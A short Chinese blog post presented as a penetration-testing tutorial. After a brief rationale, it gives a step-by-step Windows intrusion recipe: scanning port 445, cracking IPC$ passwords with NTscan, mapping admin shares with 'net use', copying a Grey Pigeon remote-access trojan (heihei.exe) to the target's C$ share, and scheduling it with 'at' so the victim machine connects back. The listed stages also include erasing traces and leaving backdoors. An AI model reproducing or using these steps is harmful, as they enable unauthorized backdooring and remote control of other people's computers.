【愚公系列】2021年12月 網絡工程-滲透測試

前言

滲透測試，是為了證明網絡防御按照預期計劃正常運行而提供的一種機制。不妨假設，你的公司定期更新安全策略和程序，時時給系統打補丁，并采用了漏洞掃描器等工具，以確保所有補丁都已打上。如果你早已做到了這些，為什么還要請外方進行審查或滲透測試呢？因為，滲透測試能夠獨立地檢查你的網絡策略，換句話說，就是給你的系統安了一雙眼睛。而且，進行這類測試的，都是尋找網絡系統安全漏洞的專業人士。

提示：以下是本篇文章正文內容，下面案例可供參考

一：測試步驟

1.授權

2.信息收集

nslookup whois

3.掃描

namp=ip范圍 端口 80（IIS，apache，什么網站）scanport

高級掃描：如IIS漏洞2003-IIS6.0 2008IIS7.0

掃描網站漏洞（）

4.利用

5.提權（shell環境、桌面環境、最高權限）

6.滅跡

7.留后門

8.滲透測試報告

二、具體流程

1.scanport掃描445端口

2.利用IPC$： 進行破解：NTscan

3.相關命令行

===================================== net use f: \\10.1.1.2\share 密碼 /user:用戶 net use f: /del net use * /del net use f: \\10.1.1.2\c$ 密碼 /user:用戶 net use \\10.1.1.2\ipc$ 密碼 /user:用戶 ==========================================

4.制作

利用光盤上的灰鴿子軟件

5.植入（留后門）

copy d:\heihei.exe \\10.1.1.2\c$

6.設置計劃任務自動執行：

net time \\10.1.1.2 at \\10.1.1.2 11:11 "c:\heihei.exe"

7.等待客戶機上線

網絡

版權聲明：本文內容由網絡用戶投稿，版權歸原作者所有，本站不擁有其著作權，亦不承擔相應法律責任。如果您發現本站中有涉嫌抄襲或描述失實的內容，請聯系我們jiasou666@gmail.com 處理，核實后本網站將在24小時內刪除侵權內容。